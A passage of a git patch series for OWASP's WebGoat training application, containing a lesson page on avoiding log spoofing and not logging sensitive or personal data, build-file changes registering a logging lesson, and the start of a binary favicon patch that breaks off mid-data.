+- link:https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html[The OWASP Logging Cheat sheet]
\ No newline at end of file
diff --git a/webgoat-lessons/logging/src/main/resources/lessonPlans/en/sensitive_logging_intro.adoc b/webgoat-lessons/logging/src/main/resources/lessonPlans/en/sensitive_logging_intro.adoc
new file mode 100644
index 000000000..31e01dfb4
--- /dev/null
+++ b/webgoat-lessons/logging/src/main/resources/lessonPlans/en/sensitive_logging_intro.adoc
@@ -0,0 +1,36 @@
+=== More About Logging
+
+As you can tell by now, log-spoofing can become an issue when users try to spoof logs. There are various ways to do this other than a form-post. Think of URL parameters or crafted JSON payloads for instance. Therefore, it is important to do
+
+- apply proper input-sanitization
+- make sure you can establish source authenticity and implement integrity controls to detect log-tampering.
+- make sure that a user cannot inject logs from any channel
+- make sure that the log storage is protected
+
+But there is more to log security than just sanitization against spoofing attacks. Let's have a look at logging sensitive information.
+
+==== Logging Sensitive Information
+
+In the previous exercise, we saw only the username passing by, but no password. Why? Because we want to make sure that an application log does not contain any sensitive information. Let's make sure that when our logs get compromised, we do not have to fear authentication information to be reused.
+
+Similarly, we should not log any other sensitive information, such as symmetric or private keys, access tokens, and such.
+
+==== Logging Personal Information
+
+Be careful with logging personal information. For instance: do not log bank account details, personally identifiable information to which a user did not consent having it logged. Do not log facts that can establish the identity of the subject being logged.
+
+What you basically want to prevent, is that people use the logs to profile people or spy on them. You want to protect the privacy of the subjects using your system.
+
+===== Special case: Access Logs
+
+One special case is always the access logs offered by your ingress and/or application server. These logs should contain at least a few things: Where the request came from, when the request was made, and possibly what the response code was. Additional information can be shared in an access log, depending on the security of the log. For instance: you don't want to share the raw request in the access logs to safeguard the privacy of your users.
+
+And here the problem often starts: access logs sometimes capture the full URL used for the request. This can include sensitive URL parameters. Therefore: be careful with what you put in the URL as parameters & let's make sure that you do not log those in an openly accessible log.
+
+
+==== Read more
+
+Want to read up on more about logging? Have a look at:
+
+- link:https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html[The OWASP Logging Cheat sheet]
+- link:https://en.wikipedia.org/wiki/General_Data_Protection_Regulation#Principles[GDPR article at Wikipedia]
\ No newline at end of file
diff --git a/webgoat-lessons/pom.xml b/webgoat-lessons/pom.xml
index cdcad2a46..60879b20b 100644
--- a/webgoat-lessons/pom.xml
+++ b/webgoat-lessons/pom.xml
@@ -42,6 +42,7 @@
 		<module>crypto</module>
         <module>path-traversal</module>
         <module>spoof-cookie</module>
+        
     </modules>
 
     <dependencies>

From fa2769cb25e6b71aa0c9344eaf65b96bb8dd6bf1 Mon Sep 17 00:00:00 2001
From: Jeroen Willemsen <jwillemsen@xebia.com>
Date: Tue, 16 Nov 2021 16:12:39 +0100
Subject: [PATCH 081/227] Updating poms

---
 webgoat-lessons/pom.xml | 2 +-
 webgoat-server/pom.xml  | 5 +++++
 2 files changed, 6 insertions(+), 1 deletion(-)

diff --git a/webgoat-lessons/pom.xml b/webgoat-lessons/pom.xml
index 60879b20b..5dd6d505f 100644
--- a/webgoat-lessons/pom.xml
+++ b/webgoat-lessons/pom.xml
@@ -42,7 +42,7 @@
 		<module>crypto</module>
         <module>path-traversal</module>
         <module>spoof-cookie</module>
-        
+
     </modules>
 
     <dependencies>
diff --git a/webgoat-server/pom.xml b/webgoat-server/pom.xml
index 1feceb309..ae1315ab5 100644
--- a/webgoat-server/pom.xml
+++ b/webgoat-server/pom.xml
@@ -159,6 +159,11 @@
             <artifactId>webgoat-lesson-template</artifactId>
             <version>${project.version}</version>
         </dependency>
+        <dependency>
+            <groupId>org.owasp.webgoat.lesson</groupId>
+            <artifactId>logging</artifactId>
+            <version>${project.version}</version>
+        </dependency>
         <dependency>
             <groupId>org.springframework.boot</groupId>
             <artifactId>spring-boot-devtools</artifactId>

From c7e04cef97a8c4eacda9a035332261ce54fa531f Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Tue, 16 Nov 2021 16:22:33 +0100
Subject: [PATCH 082/227] Add logging to pom.xml

---
 webgoat-lessons/pom.xml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/webgoat-lessons/pom.xml b/webgoat-lessons/pom.xml
index 5dd6d505f..f483656ae 100644
--- a/webgoat-lessons/pom.xml
+++ b/webgoat-lessons/pom.xml
@@ -42,6 +42,7 @@
 		<module>crypto</module>
         <module>path-traversal</module>
         <module>spoof-cookie</module>
+        <module>logging</module>
 
     </modules>
 

From 22af35a9a7d6c7e14d9c04c59e87efdebbe2f09d Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Sun, 31 Oct 2021 20:44:21 +0100
Subject: [PATCH 083/227] Add favicon to WebGoat/WebWolf

---
 .../main/resources/static/css/img/favicon.ico   | Bin 0 -> 10656 bytes
 .../src/main/resources/templates/login.html     |   1 +
 .../src/main/resources/templates/main_new.html  |   2 +-
 .../main/resources/static/css/img/favicon.ico   | Bin 0 -> 1032 bytes
 .../resources/templates/fragments/footer.html   |   5 +----
 .../resources/templates/fragments/header.html   |   4 +---
 webwolf/src/main/resources/templates/home.html  |   1 +
 webwolf/src/main/resources/templates/login.html |   1 +
 8 files changed, 6 insertions(+), 8 deletions(-)
 create mode 100644 webgoat-container/src/main/resources/static/css/img/favicon.ico
 create mode 100644 webwolf/src/main/resources/static/css/img/favicon.ico

diff --git a/webgoat-container/src/main/resources/static/css/img/favicon.ico b/webgoat-container/src/main/resources/static/css/img/favicon.ico
new file mode 100644
index 0000000000000000000000000000000000000000..bcacd934e324f2837d40199c79484947015e27b6
GIT binary patch
literal 10656
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
